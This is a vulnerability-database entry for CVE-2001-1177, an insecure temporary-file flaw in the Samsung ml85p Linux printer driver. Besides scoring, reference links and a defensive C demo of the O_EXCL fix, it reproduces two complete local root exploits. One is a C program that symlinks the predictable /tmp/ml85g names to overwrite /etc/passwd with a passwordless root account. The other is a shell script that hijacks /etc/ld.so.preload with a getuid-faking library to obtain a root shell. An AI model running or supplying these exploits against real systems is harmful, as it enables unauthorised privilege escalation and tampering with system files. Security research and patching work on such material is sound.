CVE-2001-1177
CVSS 6.2
Published: 2001-07-17 00:00:00
Revised: 2008-09-05 16:25:52

[Original text] ml85p in Samsung ML-85G GDI printer driver before 0.2.0 allows local users to overwrite arbitrary files via a symlink attack on temporary files.


[CNNVD] Samsung ML-85G GDI printer driver Arbitrary Code Overwrite Vulnerability (CNNVD-200107-107)

ml85p in Samsung ML-85G GDI printer driver versions before 0.2.0 is vulnerable: local users can overwrite arbitrary files via a symlink attack on temporary files.

- CVSS (base score)

CVSS score: 6.2 [MEDIUM]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: HIGH [exploitation requires specific access conditions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:samsung:ml-85p_printer_driver:1.0    Secure Computing ML-85P Printer Driver 1.0
cpe:/a:samsung:ml-85g_gdi_printer_driver    Secure Computing ML-85G GDI Printer Driver

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1177
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1177
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-107
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/bugtraq/2001-07/0284.html
(VENDOR_ADVISORY)  BUGTRAQ  20010717 Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package)
http://xforce.iss.net/static/6845.php
(UNKNOWN)  XF  samsung-printer-temp-symlink(6845)
http://www.securityfocus.com/bid/3008
(VENDOR_ADVISORY)  BID  3008

- Vulnerability information

Samsung ML-85G GDI printer driver Arbitrary Code Overwrite Vulnerability
Medium  Unknown
2001-07-17 00:00:00 2005-08-17 00:00:00
Local
ml85p in Samsung ML-85G GDI printer driver versions before 0.2.0 is vulnerable: local users can overwrite arbitrary files via a symlink attack on temporary files.

- Advisories and patches


- Vulnerability information (20999)

Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (1) (EDBID:20999)
hardware local
2001-07-10 Verified
0 Charles Stevenson
N/A
source: http://www.securityfocus.com/bid/3008/info

ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript.

ml85p does not check for symbolic links when creating image output files.

These files are created in /tmp with a guessable naming format, making it trivial for attackers to exploit this vulnerability.

Since user-supplied data is written to the target file, attackers may be able to elevate privileges.
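Added example (not from the advisory or the exploit authors): the temporary-file pattern the description above faults, a `/tmp/ml85g<time>` name opened without O_EXCL, shown beside the hardened open that refuses a pre-planted symlink. The private directory, the victim file, its contents and the link are constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* Vulnerable open (what ml85p did): O_CREAT without O_EXCL happily follows
 * whatever already sits at the path, a pre-planted symlink included. */
static int open_following(const char *p) { return open(p, O_WRONLY | O_CREAT | O_TRUNC, 0666); }

/* Hardened open: O_EXCL fails with EEXIST on any existing entry, and POSIX
 * guarantees that covers a symlink wherever it points (O_NOFOLLOW is extra). */
static int open_exclusive(const char *p) { return open(p, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600); }

/* Returns 1 if the file at path holds exactly the expected text. */
static int file_is(const char *path, const char *expect)
{
    char buf[32] = {0};
    int fd = open(path, O_RDONLY);
    if (fd < 0) return 0;
    ssize_t r = read(fd, buf, sizeof buf - 1);
    close(fd);
    return r >= 0 && strcmp(buf, expect) == 0;
}

/* Constructed scenario in a private directory: a victim file plus a symlink to
 * it at the predictable name ml85g<epoch seconds> that ml85p used. Returns 1 when
 * the hardened open refuses the link (victim intact) while the vulnerable open
 * writes straight through it (victim clobbered). */
int run_demo(void)
{
    char dir[] = "/tmp/ml85demo.XXXXXX", victim[256], link[256];
    int fd, refused, intact, clobbered;
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    fd = open(victim, O_WRONLY | O_CREAT, 0600);
    if (fd < 0 || write(fd, "original", 8) != 8) return 0;
    close(fd);
    snprintf(link, sizeof link, "%s/ml85g%ld", dir, (long)time(NULL));
    if (symlink(victim, link) != 0) return 0;
    refused = open_exclusive(link) < 0 && errno == EEXIST;
    intact = file_is(victim, "original");
    fd = open_following(link);
    if (fd >= 0) { if (write(fd, "clobbered", 9) != 9) return 0; close(fd); }
    clobbered = file_is(victim, "clobbered");
    unlink(link); unlink(victim); rmdir(dir);
    return refused && intact && clobbered;
}
```

Replacing the time-based name with mkstemp() gives both properties at once: an unpredictable name and O_EXCL creation, which is the standard fix for this class of bug.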

/* ml85p-xpl.c
 *
 * Quick hack to exploit ml85p
 *
 * Simply run it with the file you want to create/overwrite
 * and the data you wish to place in the file.
 *
 * Example:
 *
 * $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl
 * $ ./ml85p-xpl /etc/passwd owned::0:0::/root:/bin/bash
 *
 * Then login as owned... etc..
 *
 * by Charles Stevenson <core@ezlink.com>
 *
 * July 10 2001
 *
 * shoutz b10z
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#include <time.h>

#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 10

void usage(char*);

int main(int argc, char **argv){
   char tempfile[128] = TEMPFILE;
   int fd, i;
   time_t the_time;
   char temp[512];
   
   if (argc < 3){
      usage(argv[0]);
   }

   if((fd = mkstemp(tempfile))==-1){
      fprintf(stderr, "Error creating %s!\n",tempfile);
      exit(1);
   }

   /* begin lazy slacker coding */
   fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n");
   fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);

   /* backup old file */
   sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
   system(temp);
   
   /* set the date/time */
   sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
   system(temp);

   the_time = time(NULL);

   fprintf(stderr, "> creating a lot of symlinks\n");

   for (i=0;i<BRUTE;i++){
      /* BAD CODE: sprintf(gname,"/tmp/ml85g%d",time(0)); */
      sprintf(temp, "/tmp/ml85g%d", the_time+i);
      symlink(argv[1], temp);
   }

   sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s > file; ml85p -sf file 2>&1>/dev/null & sleep 1; killall ml85p\n", argv[2]);
   fprintf(stderr, "Running a few times since I'm lazy.\n");
   for (i=0;i<BRUTE;i++){
      system(temp);
      //sleep(1);
   }

   sprintf(temp, "/bin/ls -l %s", argv[1]);
   system(temp);

   fprintf(stderr, "> cleaning up\n");
   sprintf(temp, "/bin/rm -f /tmp/ml85*");
   system(temp);
   
   fprintf(stderr, "All done. Enjoy!\n");
   return 0;
}

void usage(char *name){
   
   fprintf(stderr, "usage: %s <filename> <data>\n", name);
   exit(1);
}

/* EOF */

- Vulnerability information (21000)

Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (2) (EDBID:21000)
hardware local
2001-07-10 Verified
0 ml85p
N/A
source: http://www.securityfocus.com/bid/3008/info
 
ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript.
 
ml85p does not check for symbolic links when creating image output files.
 
These files are created in /tmp with a guessable naming format, making it trivial for attackers to exploit this vulnerability.
 
Since user-supplied data is written to the target file, attackers may be able to elevate privileges.

#!/bin/sh
# Exploit using /usr/bin/ml85p default setuid program on 
# Mandrake Linux 8.0
#
# You need to be in the sys group to be able to execute 
# ml85p.

echo "** ml85p exploit"
# set the required umask
umask 0

# get the number of seconds since 1970
DATE=`date +"%s"`
if [ ! -u /usr/bin/ml85p ] || [ ! -x /usr/bin/ml85p ]
then
	echo "** this exploit requires that /usr/bin/ml85p is setuid and executable."
	exit 1
fi

if [ ! -e /etc/ld.so.preload ] || [ ! -w /etc/ld.so.preload ]
then
	echo "** this exploit requires that /etc/ld.so.preload does not exist."
	exit 1
fi

echo "** creating file"
ln -s /etc/ld.so.preload /tmp/ml85g"$DATE"
echo "bleh" | /usr/bin/ml85p -s
rm /tmp/ml85g"$DATE"

echo "** creating shared library"
cat << _EOF_ > /tmp/g.c
int getuid(void) { return(0); }
_EOF_

echo "** compiling and linking shared object"
gcc -c -o /tmp/g.o /tmp/g.c
ld -shared -o /tmp/g.so /tmp/g.o
rm -f /tmp/g.c /tmp/g.o

echo "** rigging ld.so.preload"
echo "/tmp/g.so" > /etc/ld.so.preload
echo "** execute su. warning all getuid() calls will return(0) until you remove"
echo "** the line \"/tmp/g.so\" from /etc/ld.so.preload. removing /tmp/g.so without"
echo "** first fixing /etc/ld.so.preload may result in system malfunction"
su -
echo "** cleaning up"
> /etc/ld.so.preload
rm -f /tmp/g.so

- Vulnerability information (21001)

Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (3) (EDBID:21001)
hardware local
2001-07-10 Verified
0 ml85p
N/A
source: http://www.securityfocus.com/bid/3008/info
  
ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript.
  
ml85p does not check for symbolic links when creating image output files.
  
These files are created in /tmp with a guessable naming format, making it trivial for attackers to exploit this vulnerability.
  
Since user-supplied data is written to the target file, attackers may be able to elevate privileges.

http://www.exploit-db.com/sploits/21001.tar.gz

- Vulnerability information

1898
Samsung ml85p Printer Utility Symlink Local Privilege Escalation
Local Access Required, Race Condition

- Vulnerability description

- Timeline

2001-07-16 Unknown
2001-07-16 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete